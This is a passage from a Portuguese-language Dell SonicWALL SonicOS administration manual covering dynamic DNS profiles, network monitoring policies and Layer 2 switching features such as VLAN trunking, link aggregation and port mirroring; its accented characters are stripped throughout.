o provedor (ou provedores) de servios DDNS da sua preferncia. possvel usar vrios
provedores simultaneamente. Consulte os links dos vrios provedores listados acima. O
processo de registro normalmente envolve um e-mail de confirmao do provedor, com uma
confirmao final executada visitando um URL exclusivo incorporado no e-mail de
confirmao. Aps fazer login na pgina do provedor selecionado, voc dever visitar o link
administrativo (geralmente "adicionar" ou "gerenciar") e criar as entradas de seu host. Isso

deve ser executado antes de tentar usar o cliente de DNS dinmico no SonicOS. A pgina
Rede > DNS dinmico fornece as definies para configurar o dispositivo de segurana Dell
SonicWALL para usar o seu servio DDNS.
Para configurar o DNS dinmico no dispositivo de segurana Dell SonicWALL, execute estas
etapas:
Etapa 1 Na pgina Rede > DNS dinmico, clique no boto Adicionar. A janela Adicionar perfil DDNS
exibida.
Etapa 2 Se a opo Habilitar este perfil DDNS estiver marcada, o perfil administrativamente
habilitado e o firewall executa as aes definidas na seo Configuraes online, na guia
Avanado.
Etapa 3 Se a opo Usar configuraes online estiver marcada, o perfil est administrativamente
online.
Etapa 4 Insira um nome para atribuir entrada DDNS no campo Nome do perfil. Pode ser qualquer
valor usado para identificar a entrada na tabela Configuraes de DNS dinmico.
Etapa 5 Na pgina Perfil, selecione o Provedor na lista suspensa na parte superior da pgina.
DynDNS.org e changeip.com usam HTTPS, enquanto yi.org e no-ip.com usam HTTP. Este
exemplo usa DynDNS.org. Dyndns.org requer a seleo de um servio. Este exemplo assume
que voc criou um registro de servio dinmico com dyndns.org.

Etapa 6 Digite seu nome de usurio e sua senha de dyndns.org nos campos Nome de usurio e
Senha.
Etapa 7 Insira o nome de domnio totalmente qualificado (FQDN) do nome de host que voc registrou
com dyndns.org. Certifique-se de fornecer o mesmo nome de host e domnio que voc
configurou.
Etapa 8 Como alternativa, selecione uma interface de WAN na lista suspensa Vinculado a para atribuir
este perfil DDNS interface de WAN especfica. Isso permite que os administradores que
esto configurando o balanceamento de carga de vrias WAN anunciem um endereo IP
previsvel ao servio DDNS. Por padro, isso definido para QUALQUER, o que significa que
o perfil gratuito em qualquer uma das interfaces de WAN no dispositivo.
Etapa 9 Ao usar DynDNS.org, selecione o Tipo de servio na lista suspensa que corresponde ao seu
tipo de servio por meio de DynDNS.org. As opes so:
Dinmico um servio de DNS dinmico gratuito.
Personalizado uma soluo de DNS primrio gerenciado que fornece um servio
DNS primrio/secundrio unificado e uma interface baseada na Web. Suporta
endereos IP dinmicos e estticos.
Esttico um servio DNS gratuito para endereos IP estticos.
Etapa 10 Ao usar DynDNS.org, voc pode selecionar opcionalmente Habilitar curinga e/ou configurar
uma entrada de servidor de mensagens no campo Servidor de mensagens. Verifique em
Servidor de mensagens de backup se esse o servidor de mensagens de backup.
Etapa 11 Clique na guia Avanado. Normalmente possvel deixar as configuraes padro nesta
pgina.
Etapa 12 A seo Configuraes online fornece controle sobre que endereo est registrado no
provedor de DNS dinmico. As opes so:
Deixar o servidor detectar o endereo IP o provedor de DNS dinmico determina
o endereo IP com base no endereo de origem da conexo. Esta a configurao
mais comum.

Definir automaticamente o endereo IP para o endereo IP da interface de WAN
primria isto far com que o firewall declare seu endereo IP de WAN como o
endereo IP registrado, substituindo a deteco automtica pelo servidor de DNS
dinmico. til se a deteco no estiver funcionando corretamente.
Especificar o endereo IP manualmente permite que o endereo IP seja registrado
para ser manualmente especificado e declarado.
Etapa 13 A seo Configuraes offline controla qual endereo IP registrado no provedor de servios
de DNS dinmico se a entrada de DNS dinmico for colocada offline (desabilitada) localmente
no firewall.
As opes so:
No fazer nada a configurao padro. Isto permite que o endereo anteriormente
registrado se mantenha atual no provedor de DNS dinmico.
Usar o endereo IP offline configurado anteriormente no site do provedor se seu
provedor suportar a configurao manual de Configuraes offline, voc pode
selecionar esta opo para usar essas configuraes quando este perfil colocado
offline administrativamente.
Tabela de configuraes de DNS dinmico

A tabela Configuraes de DNS dinmico fornece uma exibio de tabela de perfis DDNS
configurados.
A tabela Configuraes de DNS dinmico inclui as seguintes colunas:
Nome do perfil o nome atribudo entrada DDNS durante a sua criao. Pode ser
qualquer valor e usado apenas para identificao.
Domnio o nome de domnio totalmente qualificado (FQDN) da entrada DDNS.
Provedor o provedor de DDNS no qual a entrada est registrada.
Status o ltimo status reportado/atual da entrada DDNS. Os estados possveis so:
Online a entrada DDNS est administrativamente online. A configurao de IP atual
para esta entrada mostrada com um carimbo de data/hora.
Colocado offline localmente a entrada DDNS est administrativamente offline. Se
a entrada estiver habilitada, a ao configurada na seo Configuraes offline da guia
Avanado ser executada.
Abuso o provedor de DDNS considerou o tipo ou a frequncia de atualizaes como
abusivo(a). Verifique as diretrizes do provedor de DDNS para determinar o que
considerado abuso.
Sem alterao de IP possvel abuso uma atualizao forada sem uma alterao
de endereo IP considerada por alguns provedores de DDNS como abusiva.
Atualizaes automticas somente ocorrero quando ocorrerem alteraes de estado
ou endereo. Manual ou foradas, s devem ser feitas quando absolutamente
necessrias, como quando as informaes registradas esto incorretas.
Desabilitada a conta foi desabilitada devido a um erro de configurao ou a uma
violao de poltica. Verifique as configuraes do perfil e o status da conta DDNS com
o provedor.
Conta invlida as informaes da conta fornecidas no so vlidas. Verifique as
configuraes do perfil e o status da conta DDNS com o provedor.

Erro de rede no possvel comunicar com o provedor de DDNS devido a um erro
de rede suspeito. Verifique se o provedor est acessvel e online. Tente a ao
novamente mais tarde.
Erro de provedor o provedor de DDNS no capaz de executar a ao solicitada
no momento. Verifique as configuraes do perfil e o status da conta DDNS com o
provedor. Tente a ao novamente mais tarde.
Conta de no doador determinadas funes fornecidas de determinados
provedores, como configuraes de endereos offline, s esto disponveis para
assinantes que realizaram pagamentos ou donativos. Entre em contato com o provedor
para obter mais detalhes sobre os servios que podem exigir pagamento ou doao.
Habilitado quando selecionado, esse perfil administrativamente habilitado e o firewall
realizar a ao Configuraes online que configurada na guia Avanado. Esta
configurao tambm pode ser controlada usando a caixa de seleo Habilitar este perfil
DDNS na guia Perfil da entrada. Se desmarcar esta caixa de seleo o perfil ser
desabilitado e no ocorrero comunicaes com o provedor de DDNS para este perfil at
que o perfil seja novamente habilitado.
Online quando selecionado, o perfil fica administrativamente online. A configurao
tambm pode ser controlada usando a caixa de seleo Usar configuraes online na
guia Perfil da entrada. Se desmarcar esta caixa de seleo enquanto o perfil estiver
habilitado, tal colocar o perfil offline e o firewall realizar a ao Configuraes offline
que est configurada na guia Avanado.
Configurar inclui o cone de edio para configurar as definies de perfil DDNS e
o cone de excluso para excluir a entrada do perfil DDNS.

Captulo 28
Configurar o monitoramento de rede
Rede > Monitoramento de rede

A pgina Rede > Monitoramento de rede fornece um mecanismo flexvel para monitorar a
viabilidade do caminho de rede. Os resultados e status deste monitoramento so exibidos
dinamicamente na pgina Monitoramento de rede e so tambm fornecidos para componentes
de cliente afetados e registrados no log do sistema.
Cada poltica de NM personalizada define um Objeto de endereo de destino para ser
analisado. Este Objeto de endereo poder ser um Host, Grupo, Intervalo ou FQDN. Se o
Objeto de endereo de destino for um Grupo, Intervalo ou FQDN com vrios endereos
resolvidos, o Monitoramento de rede investiga cada destino de investigao e deriva o estado
da poltica de NM com base nos resultados.
\
Os elementos da coluna Status exibem o status da conexo de rede para o destino:

Verde indica que o status da poltica est ATIVO.
Vermelho indica que o status da poltica est INATIVO.
Amarelo indica que o status da poltica DESCONHECIDO.
Configurar o monitoramento de rede | 399

Voc pode ver detalhes do status da investigao passando o mouse sobre a luz verde,
vermelha ou amarela de uma poltica.
As informaes a seguir so exibidas no status da investigao:

A porcentagem de investigaes bem-sucedidas.
O nmero de alvos da investigao resolvida.
O nmero total de investigaes enviadas.
O nmero total de respostas de investigaes bem-sucedidas recebidas.
Uma lista de alvos da investigao resolvida e seu status.
Adicionar uma nova poltica de monitoramento de rede

Para adicionar uma poltica de monitoramento de rede no dispositivo de segurana Dell
SonicWALL, execute estas etapas:
Etapa 1 Na pgina Rede > Monitoramento de rede, clique no boto Adicionar. A janela Adicionar
poltica de monitoramento de rede exibida.

Etapa 2 Insira as seguintes informaes para definir a poltica de monitoramento de rede:
Nome digite uma descrio da poltica de Monitoramento de rede.
Destino de investigao selecione o Objeto de endereo ou o Grupo de endereos
como o destino da poltica. Os objetos de endereos podem ser Hosts, Grupos,
Intervalos ou FQDNs. Os objetos dentro de um objeto de Grupo podem ser Host,
Intervalo ou Objetos de endereos de FQDN. Voc pode criar um novo objeto de
endereo dinamicamente selecionando Criar novo objeto de endereo.
Tipo de investigao selecione o tipo apropriado de investigao para a poltica de
monitoramento de rede:
Ping (ICMP) essa investigao usa a tabela de rota para localizar a interface de
egresso e o prximo salto para os destinos de investigao definidos. Uma
solicitao de eco de ping enviada para a interface de egresso com o endereo
IP de origem da interface de egresso. Uma resposta de eco deve retornar na
mesma interface dentro do limite de tempo limite da resposta especificado para o
ping para ser considerado como bem-sucedido.
TCP essa investigao usa a tabela de rota para localizar a interface de egresso
e o prximo salto para os destinos de investigao definidos. Um pacote TCP SYN
enviado para o destino de investigao com o endereo IP de origem da interface
de egresso. Uma resposta bem-sucedida ser contabilizada de forma
independente para cada destino de investigao quando o destino responde com
um SYN/ACK ou RST atravs da mesma interface dentro da janela de Tempo limite
da resposta. Quando um SYN/ACK recebido, um RST enviado para fechar a
conexo. Se for recebido um RST, no retornada nenhuma resposta.
Ping (ICMP) Rota explcita essa investigao ignora a tabela de rota e usa o
endereo IP de origem da interface especificada no menu suspenso Interface de
sada para enviar um Ping para os destinos. Se Prximo gateway de salto no for
especificado, a investigao pressupe que os destinos esto diretamente
conectados rede da Interface de sada.
TCP Rota explcita essa investigao ignora a tabela de rota e usa o endereo
IP de origem da interface especificada no menu suspenso Interface de sada para
enviar um pacote TCP SYN para os destinos. Se Prximo gateway de salto no for
especificado, a investigao pressupe que os destinos esto diretamente
conectados rede da Interface de sada. Quando um SYN/ACK recebido, um
RST enviado para fechar a conexo. Se for recebido um RST, no retornada
nenhuma resposta.
Prximo gateway de salto especifica manualmente o prximo salto que ser
usado a partir da interface de sada para alcanar o destino de investigao. Essa
opo deve ser configurada para polticas de Rota explcita. Para polticas de Rota
no explcita, a investigao usa a tabela de rotas do dispositivo para determinar
a interface de egresso para alcanar o destino da investigao. Se um Prximo
gateway de salto no for especificado, a investigao pressupe que os destinos
esto diretamente conectados rede da Interface de sada.
Interface de sada especifica manualmente qual interface usada para enviar a
investigao. Essa opo deve ser configurada para polticas de Rota explcita. Para
polticas de Rota no explcita, a investigao usa a tabela de rotas do dispositivo para
determinar a interface de egresso para alcanar o destino de investigao.
Porta especifica a porta de destino de hosts de destino para investigaes de TCP.
No est especificada nenhuma porta para investigaes de ping.
Etapa 3 Como alternativa, voc pode ajustar os seguintes limites para as investigaes:
Configurar o monitoramento de rede | 401

Investigar hosts a cada o nmero de segundos entre cada investigao. Esse
nmero no pode ser menor que o do campo Tempo limite de resposta.
Tempo limite de resposta o nmero de segundos que o Monitoramento de rede
aguarda por uma resposta de cada investigao individual antes de contabilizar uma
investigao perdida para o destino de investigao especfico. O Tempo limite de
resposta no pode exceder o do campo Investigar hosts a cada.
O estado de investigao definido para INATIVO aps o nmero de
investigaes consecutivas perdidas que aciona uma transio de estado de host para
INATIVO.
O estado de investigao definido para ATIVO aps o nmero de investigaes
bem-sucedidas consecutivas que aciona uma transio de estado de host para ATIVO.
Todos os hosts devem responder a marcao desta caixa de seleo especifica
que todos os estados de hosts do destino de investigao devem estar ATIVOS antes
de ser possvel a transio do Estado de poltica para ATIVO. Se no estiver marcada,
o Estado de poltica definido para ATIVO se qualquer um dos Estados de hosts
estiver ATIVO.
Etapa 4 Como alternativa, voc pode inserir um comentrio descritivo sobre a poltica no campo
Comentrio.
Etapa 5 Clique em Adicionar para enviar a poltica de Monitoramento de rede.
Configurar o roteamento baseado em poltica habilitado por

investigao
Ao configurar uma rota esttica, voc pode opcionalmente configurar uma poltica de
Monitoramento de rede para a rota. Quando for usada uma poltica de monitoramento de rede,
a rota esttica ser dinamicamente desabilitada ou habilitada, com base no estado da
investigao da poltica. Para obter mais informaes, consulte Configurao de roteamento
com base em poltica habilitado por investigao na pgina 307.

Parte 5
Comutao
| 403
Captulo 29
Configurando a Comutao
Comutao
Esta seo descreve como configurar e gerenciar o recurso Comutao no SonicOS.
Viso geral da Comutao na pgina 405
Configurando a Comutao na pgina 408
Glossrio na pgina 416
Viso geral da Comutao

Esta seo fornece uma apresentao do recurso Comutao. Esta seo contm as
seguintes subsees:
O que a Comutao? na pgina 405
Vantagens da comutao na pgina 406
Como funciona a comutao? na pgina 407
O que a Comutao?
O SonicOS oferece a funcionalidade de comutao da Camada 2 (camada de link de dados).
A funcionalidade suporta os seguintes recursos de comutao:
Truncamento de VLAN Oferece a capacidade de truncar diferentes VLANs entre vrios
comutadores.
Protocolo de rvore de Verificao Rpida Previne a formao de loops quando
comutadores ou pontes esto interconectados por meio de vrios caminhos e fornece a
convergncia de rede aps uma mudana de topologia.
Descoberta de Rede da Camada 2 Usa os protocolos IEEE 802.1AB (LLDP) e LLTD da
Microsoft e a tabela de encaminhamento do comutador para descobrir dispositivos visveis
de uma porta.
Agregao de links Oferece a capacidade de agregar portas para um maior desempenho
e redundncia.
Configurando a Comutao | 405

Espelhamento de porta Permite que o administrador atribua uma porta de espelho para
espelhar pacotes de entrada, sada ou bidirecionais provenientes de um grupo de portas.
Qualidade de Servio de Camada 2 De acordo com a porta, permite uma configurao
para confiar no Custo de Servio (CoS) (802.1p) ou confiar na marcao DSCP e lida com
os quadros de forma adequada.
Controle de Taxa/Controle de Fluxo De acordo com a porta, a largura de banda dos
quadros de entrada pode ser ajustada em quatro modos, limitando todos os quadros/
quadros de unicast inundado/quadros de difuso seletiva/quadros de transmisso. A
limitao de taxa para os quadros de sada pode ser habilitada ou desabilitada.
Segurana de portas Oferece a capacidade de vincular um endereo MAC ou vrios
endereos MAC a uma interface de porta especfica.
Quadros Jumbo O suporte aos Quadros Jumbo permite que o SonicOS processe os
quadros de Ethernet com cargas que variam de 1.500 a 9.000 bytes.
Vantagens da comutao
O SonicOS fornece uma soluo de segurana e comutao combinada. Os recursos de
comutao da Camada 2 melhoram a implantao e interoperabilidade dos dispositivos
SonicWALL nas redes de Camada 2 existentes.
Os recursos de comutao avanados de um dispositivo de segurana de rede fornecem as
seguintes vantagens:
Aumento da densidade de portas Com um dispositivo que fornece 26 interfaces, incluindo
24 portas do comutador, possvel diminuir o nmero de dispositivos em sua rede interna .
Maior segurana em mltiplas portas do comutador A arquitetura PortShield fornece a
flexibilidade para configurar todas as 26 portas LAN do comutador em zonas de segurana
separadas, como LANs , WLANs e DMZs, fornecendo proteo no apenas da WAN e
DMZ, mas tambm entre os dispositivos na LAN. De forma efetiva, cada zona de
segurana tem o seu prprio "minicomutador" com velocidade de fios, que aproveita a
proteo de um firewall dedicado de inspeo profunda de pacotes.
Truncamento de VLAN Simplifica o gerenciamento e configurao da VLAN, reduzindo a
necessidade de configurar as informaes da VLAN em cada comutador.
Descoberta da Camada 2 Fornece informaes de rede da Camada 2 para todos os
dispositivos conectados ao dispositivo.
Agregao de Links As portas agregadas possibilitam um maior desempenho por meio
de balanceamento de carga, quando conectadas a um comutador que oferea suporte
agregao, e fornecem redundncia, quando conectadas a um comutador ou servidor que
oferea suporte agregao.
Segurana de portas Permite que os administradores vinculem um endereo MAC
confivel ou vrios endereos MAC a uma porta especfica para diminuir o acesso no
autorizado nessa porta.
Protocolo de rvore de Verificao Rpida Permite a redundncia em caso de queda de
uma conexo, evitando a formao de loops quando comutadores ou pontes esto
interconectados por vrios caminhos.
Qualidade de Servio da Camada 2 Permite a priorizao de trfego e o gerenciamento
de largura de banda para minimizar o atraso de rede, usando a classificao de Custo de
Servio (CoS) e marcao DSCP.
Espelhamento de porta Permite que o administrador monitore e inspecione o trfego de
rede em uma ou mais portas com facilidade.

Quadros Jumbo Permite uma maior velocidade de processamento e reduz o nmero de
quadros Ethernet que sero processados. Em alguns casos, o aumento da velocidade de
processamento no pode ser observado. No entanto, haver alguma melhora na
velocidade de processamento se a travessia de pacotes for realmente de tamanho jumbo.
Controle de Taxa/Controle de Fluxo O controle de fluxo de presso de retorno nas portas
half-duplex e o controle de fluxo de pausa com base em quadro nas portas full-duplex
permitem uma perda zero de pacotes em um congestionamento de trfego temporrio.
Segurana de portas A vinculao de um endereo MAC ou vrios endereos MAC a
uma interface de porta especfica oferece segurana, j que os quadros cujos endereos
de origem no esto contidos na tabela sero descartados.
Como funciona a comutao?

Os recursos de comutao possuem seu prprio grupo de menu no painel de navegao
esquerda da interface de gerenciamento do SonicOS.
Alguns recursos de comutao funcionam nos Grupos do PortShield e exigem uma

configurao preliminar na pgina Rede > Grupos do PortShield. Outros funcionam de acordo
com as configuraes de Rede > Interface existentes. O recurso de Segurana de portas usa
objetos de endereo MAC. Para obter mais informaes sobre como configurar esses recursos
relacionados no SonicOS, consulte as sees correspondentes:
Rede > Interfaces na pgina 185
Rede > Grupos do PortShield na pgina 251

Para obter detalhes sobre o funcionamento de cada funo de comutao, consulte a seo
relacionada em Configurando a Comutao na pgina 408.
Configurando a Comutao
Esta seo contm as seguintes sees:
Configurando o Truncamento de VLAN na pgina 408
Configurando a Descoberta da Camada 2 na pgina 411
Configurando a Agregao de links na pgina 412
Configurando o Espelhamento de portas na pgina 414
Configurando o Truncamento de VLAN
As portas do comutador no atribudas no SonicOS podem funcionar como portas de tronco

VLAN. possvel ativar ou desativar VLANs nas portas de tronco, permitindo que as VLANs
existentes no SonicOS sejam compartilhadas com as respectivas VLANs em um outro
comutador conectado por meio da porta de tronco. O SonicOS suporta o encapsulamento
802.1Q nas portas de tronco. Um mximo de 32 VLANs pode ser ativado em cada porta de
tronco.
O recurso de Truncamento de VLAN fornece as seguintes funes:
Alterar a ID da VLAN de grupos do PortShield existentes
Adicionar/excluir portas de tronco da VLAN
Habilitar/desabilitar uma ID personalizada da VLAN nas portas de tronco
O intervalo de ID da VLAN permitido de 1 a 4.094. Algumas IDs da VLAN so reservadas
para uso do PortShield. O intervalo reservado exibido na interface de gerenciamento do
SonicOS. possvel marcar alguns grupos do PortShield como "Truncados". Depois que o
grupo do PortShield for desmontado, a VLAN associada automaticamente desativada nas
portas de tronco.

As VLANs podem existir localmente na forma de grupos do PortShield ou podem ser VLANs
totalmente remotas. Abaixo, a pgina Rede > PortShield mostra um grupo do PortShield com
X16 como a interface do PortShield e X17, X17 e X19 como membros do grupo do PortShield.
possvel alterar a ID da VLAN dos grupos do PortShield no SonicOS. Isto permite uma fcil
integrao com a numerao existente da VLAN.
O SonicOS no permite a alterao de associao VLAN de portas de forma ad hoc. A
associao VLAN de uma porta deve ser configurada por meio da configurao do PortShield
na interface de gerenciamento do SonicOS. Para obter mais informaes sobre a configurao
de grupos do PortShield, consulte Rede > Grupos do PortShield na pgina 251.
Uma interface virtual (denominada Interface de Tronco da VLAN) criada automaticamente
para as VLANs remotas. Quando a mesma VLAN remota habilitada em outra porta de tronco,
nenhuma nova interface criada. Todos os pacotes com o mesmo rtulo de VLAN que estejam
entrando em diferentes portas de tronco so tratados pela mesma interface virtual. Esta uma
diferena fundamental entre as subinterfaces da VLAN e as interfaces de tronco da VLAN.
A coluna Nome na pgina Rede > Interfaces exibe as Interfaces de tronco da VLAN para os
troncos de VLAN nos quais as IDs 150 e 332 de VLAN estejam habilitadas.
possvel habilitar qualquer VLAN, local ou remota, em um tronco de VLAN para permitir a
ponte para duas respectivas VLANs em outro comutador. Por exemplo, a VLAN 0345 local
pode ser habilitada no tronco de VLAN para a porta X2, que tambm possui duas VLANs
remotas habilitadas nela.
A Tabela de VLAN na pgina Comutao > Truncamento de VLAN exibe a porta de tronco X2
como um membro da VLAN 345 local depois que a VLAN estiver habilitada no tronco de VLAN.
O truncamento de VLAN interopera com os recursos Agregao de links e Espelhamento de

portas. Uma porta de tronco da VLAN pode ser espelhada, mas no pode agir como uma porta
de espelho em si. No possvel habilitar a segurana de porta esttica na porta de tronco da
VLAN.
Portas configuradas como troncos da VLAN no podem ser usadas para qualquer outra funo
e so reservadas para uso apenas na Camada 2. Por exemplo, no possvel configurar um
endereo IP para as portas de tronco.
Quando uma interface de VLAN de tronco tiver sido configurada em uma porta de tronco
especfica, essa porta de tronco no pode ser excluda at que a interface de VLAN seja
removida, mesmo que a VLAN esteja habilitada em vrias portas de tronco. Esta uma
limitao de implantao e ela ser tratada em uma verso futura.
Consulte as seguintes sees para obter mais informaes sobre a configurao de VLANs:
Editando VLANs na pgina 409
Adicionando uma porta de tronco da VLAN na pgina 410
Excluindo portas de tronco da VLAN na pgina 410
Habilitando uma porta de tronco da VLAN na pgina 410
Editando VLANs
Para editar uma VLAN, siga as etapas a seguir:
Etapa 1 Na pgina Comutao > Truncamento de VLAN, clique no cone Configurar na linha da
Tabela de VLAN da ID de VLAN que voc deseja editar.
Etapa 2 Na janela Editar VLAN para o PortShield, siga uma das seguintes etapas:

Digite uma ID de VLAN diferente para o campo ID da VLAN. possvel digitar qualquer
ID de VLAN, exceto a ID de VLAN original especificada pelo sistema ou quaisquer
outras contidas nas IDs de VLAN Reservadas.
Use o nmero de ID da VLAN no campo ID da VLAN que corresponda quele que voc
clicou no cone Configurar.
Etapa 3 Para habilitar o truncamento para esta VLAN, marque a caixa de seleo Truncada. Para
desabilitar o truncamento para esta VLAN, desmarque a caixa de seleo.
Adicionando uma porta de tronco da VLAN

Para adicionar uma porta de tronco da VLAN, realize as seguintes etapas:
Etapa 1 Na pgina Comutao > Truncamento de VLAN em Troncos da VLAN, clique no boto
Adicionar.
Etapa 2 Na janela Adicionar uma porta de tronco da VLAN, selecione a porta que ser adicionada na
lista suspensa Porta de tronco.
Excluindo portas de tronco da VLAN

Para excluir uma ou mais portas de tronco da VLAN, realize as seguintes etapas:
Etapa 1 Na pgina Comutao > Truncamento de VLAN em Troncos da VLAN, selecione uma ou mais
caixas de seleo para as portas de tronco da VLAN que voc deseja excluir.
Etapa 2 Clique no boto Excluir.
Habilitando uma porta de tronco da VLAN

Para habilitar uma ID de VLAN personalizada em uma porta de tronco especfica:
Etapa 1 Na pgina Comutao > Truncamento de VLAN em Troncos da VLAN, clique no boto
Habilitar VLAN.
Etapa 2 Na janela Habilitar VLAN, selecione uma porta truncada na lista suspensa Porta truncada.
Esta a porta que voc deseja usar para truncar a ID da VLAN indicada no prximo campo.
Etapa 3 No campo ID da VLAN, digite a ID da VLAN que ser truncada. Ela pode ser uma ID da VLAN
em outro comutador.

Configurando a Descoberta da Camada 2
O dispositivo SonicOS usa os protocolos IEEE 802.1AB (LLDP)/LLTD da Microsoft e a tabela

de encaminhamento do comutador para descobrir ns visveis de uma porta. Eles so
protocolos da Camada 2 e no atravessam um domnio de transmisso.
Uma tabela ARP usada para conectar os endereos MAC aos endereos IP.
A descoberta est ativa quando o sistema inicializado e depois no reinicia, a menos que
voc clique no boto de atualizao da Descoberta L2 na interface de gerenciamento do
SonicOS.
Para reiniciar a descoberta da Camada 2 em vrias interfaces, selecione a caixa de seleo
ao lado das interfaces desejadas e clique no boto Atualizar selecionadas localizado na parte
inferior da pgina.

Configurando a Agregao de links
A Agregao de links permite a redundncia de portas e o balanceamento de carga nas redes

da Camada 2. O balanceamento de carga controlado pelo hardware, com base nos pares de
endereos MAC de origem e de destino. A pgina Comutao > Agregao de links fornece
informaes e estatsticas e permite a configurao de interfaces para a agregao.
A Agregao de links estticos e dinmicos suportada. A Agregao de links dinmicos
suportada com o uso do LACP (IEEE 802.1AX). As portas que esto localizadas na mesma
VLAN (mesmo Grupo do PortShield) ou portas de tronco da VLAN so elegveis para a
agregao de links. At quatro portas podem ser agregadas em um grupo lgico e no pode
haver quatro Links Lgicos (LAGs) configurados.
Dois tipos principais de uso so ativados por esse recurso:
Firewall para servidor implementado por meio da habilitao da Agregao de links nas
portas da mesma VLAN (mesmo Grupo do PortShield). Esta configurao permite a
redundncia de portas, mas no suporta o balanceamento de carga na direo dispositivo-
para-servidor devido a uma limitao de hardware no dispositivo.
Firewall para comutador Permitido por meio da habilitao da Agregao de links nas
portas de tronco da VLAN. O balanceamento de carga realizado automaticamente pelo
hardware. O dispositivo suporta um algoritmo de balanceamento de carga com base nos
pares de endereos MAC de origem e de destino.
De forma semelhante configurao do PortShield, voc seleciona uma interface que
representa o grupo agregado. Esta porta denominada um agregador. A porta agregadora
deve receber uma chave exclusiva. Por padro, a chave da porta agregadora a mesma que
seu nmero de interface. As portas no agregadoras podem ser opcionalmente configuradas
com uma chave, que pode ajudar a prevenir um LAG errneo se as conexes do comutador
estiverem conectadas de forma incorreta.
As portas so unidas se elas estiverem conectadas ao mesmo parceiro de link e se suas
chaves forem correspondentes. Se no houver nenhuma chave configurada para uma porta
(quando a porta estiver em modo automtico), ela se unir a um agregador que esteja
conectado ao mesmo parceiro de link. O parceiro de link descoberto por meio das
mensagens do LACP. Um parceiro de link no pode ser descoberto para a Agregao de links
estticos. Neste caso, as portas so agregadas apenas com base nas chaves.
Como um host do PortShield, a porta agregadora no pode ser removida do LAG, j que ela
representa o LAG no sistema.

Nota Depois que a agregao de links tiver sido ativada nas portas de tronco da VLAN, VLANs
adicionais no podero ser adicionadas ou excludas no LAG.
Nota Se precisar habilitar o RSTP no LAG, primeiro habilite o RSTP nos membros individuais e
depois habilite a agregao de links.
Criando um Link Lgico (LAG)

Para criar um Link Lgico (LAG), realize as seguintes etapas:
Etapa 1 Na pgina Comutao > Agregao de links, clique no boto Adicionar.

Etapa 2 Na janela Adicionar uma porta de LAG, selecione a interface na lista suspensa Porta.
Etapa 3 Para especificar uma chave, desmarque a caixa de seleo Detectar automaticamente e
digite a chave desejada no campo Chave.
Etapa 4 Se essa interface for o agregador para o LAG, selecione a caixa de seleo Agregador.
Somente uma interface pode ser um agregador para um LAG.
Etapa 6 Na pgina Comutao > Agregao de links, clique novamente no boto Adicionar.
Etapa 7 Na janela Adicionar uma porta de LAG, selecione a interface para o parceiro de link na lista
suspensa Porta.
Etapa 8 Se voc especificou uma chave para a primeira interface (o agregador), desmarque a caixa de
seleo Detectar automaticamente e digite a mesma chave no campo Chave. Se a opo
Detectar automaticamente foi deixada habilitada para a primeira interface, deixe-a habilitada
para esta tambm.
Etapa 9 Desmarque a caixa de seleo Agregador. Somente uma interface pode ser um agregador
para um LAG.
A pgina Comutao > Agregao de links exibe o LAG. A coluna Parceiro exibir os
endereos MAC dos parceiros de link depois que eles forem fisicamente conectados.

Configurando o Espelhamento de portas
possvel configurar o Espelhamento de portas no SonicOS para enviar uma cpia de pacotes
de rede observada em uma ou mais portas do comutador (ou em uma VLAN) para outra porta
do comutador denominada porta de espelho. Ao se conectar porta de espelho, possvel
monitorar o trfego que transmitido por meio da(s) porta(s) espelhada(s).
Uma porta de tronco da VLAN pode ser espelhada, mas no pode agir como uma porta de
espelho em si.
A pgina Comutador > Espelhamento de portas permite que o administrador atribua portas de
espelho para espelhar pacotes de entrada, sada ou bidirecionais provenientes de um grupo
de portas.
Consulte os procedimentos a seguir:
Configurando um grupo no Espelhamento de portas na pgina 414
Excluindo um grupo do Espelhamento de portas na pgina 415
Configurando um grupo no Espelhamento de portas

Para criar um novo grupo no espelhamento de portas, realize as seguintes etapas:
Etapa 1 Na pgina Comutao > Espelhamento de portas, clique no boto Novo grupo.

Etapa 2 Na janela Editar Grupo de espelho, digite um nome descritivo para o grupo no campo Nome
do Grupo de interface.
Etapa 3 Para Direo, selecione uma das seguintes opes:

entrada Selecione entrada para monitorar o trfego que chega na(s) porta(s)
espelhada(s).
sada Selecione sada para monitorar o trfego que enviado da(s) porta(s)
espelhada(s).
ambos Selecione ambos para monitorar o trfego nas duas direes da(s) porta(s)
espelhada(s).
Etapa 4 Na lista Todas as interfaces, selecione a porta que espelhar o trfego e clique no boto de
seta direita na parte superior para mov-la para o campo Porta de espelho. Use uma porta
no atribuda como a porta de espelho.
Etapa 5 Na lista Todas as interfaces, selecione uma ou mais portas que sero monitoradas e clique
no boto de seta direita na parte inferior para mov-la(s) para o campo Portas espelhadas.
Voc ser capaz de monitorar o trfego da(s) porta(s) espelhada(s) por meio da conexo
porta de espelho.
Etapa 6 Para habilitar o espelhamento de portas para essas portas, selecione a opo Habilitar. Clique
em OK.
Excluindo um grupo do Espelhamento de portas

Para remover um grupo do espelhamento de portas, realize as seguintes etapas:
Etapa 1 Na pgina Comutao > Espelhamento de portas, selecione a caixa de seleo ao lado do
grupo do espelhamento de portas que voc deseja excluir.
Etapa 2 Clique no boto Desagrupar.

Glossrio
BPDU Bridge Protocol Data Unit Usada no RSTP, as BPDUs so quadros de dados
especiais usados para trocar informaes sobre IDs da ponte e custos do
caminho raiz. As BPDUs so trocadas a intervalos regulares de poucos segundos
para permitir aos comutadores controlar a topologia de rede e iniciar ou parar o
encaminhamento de portas.
CoS Classe de Servio A CoS (IEEE 802.1p) define oito classes diferentes de
servios que so indicadas em um campo de usurio de 3 bits de prioridade em
um cabealho IEEE 802.1Q adicionado a um quadro de Ethernet ao usar quadros
rotulados em uma rede 802.1.
DSCP Differentiated Services Code Point Tambm conhecido como DiffServ, o DSCP
uma arquitetura de rede que define um mecanismo simples, de granulao
grossa e com base em classe para a classificao e gerenciamento do trfego de
rede e fornecimento de garantias de Qualidade de Servio (QoS) em redes IP. A
RFC 2475, publicada em 1998 pelo IETF, define o DSCP. O DSCP funciona por
meio da marcao de um campo de 8 bits no cabealho do pacote IP.
IETF Internet Engineering Task Force A IETF uma organizao de padres abertos
que desenvolve e promove padres da Internet.
L2 Camada 2 de OSI (Ethernet) A Camada 2 do modelo OSI de sete camadas a

Camada de Link de Dados, na qual o protocolo Ethernet executado. A Camada
2 usada para transferir dados entre as entidades de rede.
LACP Link Aggregation Control Protocol O LACP uma especificao do IEEE que
fornece uma maneira de combinar vrias portas fsicas para formar um nico
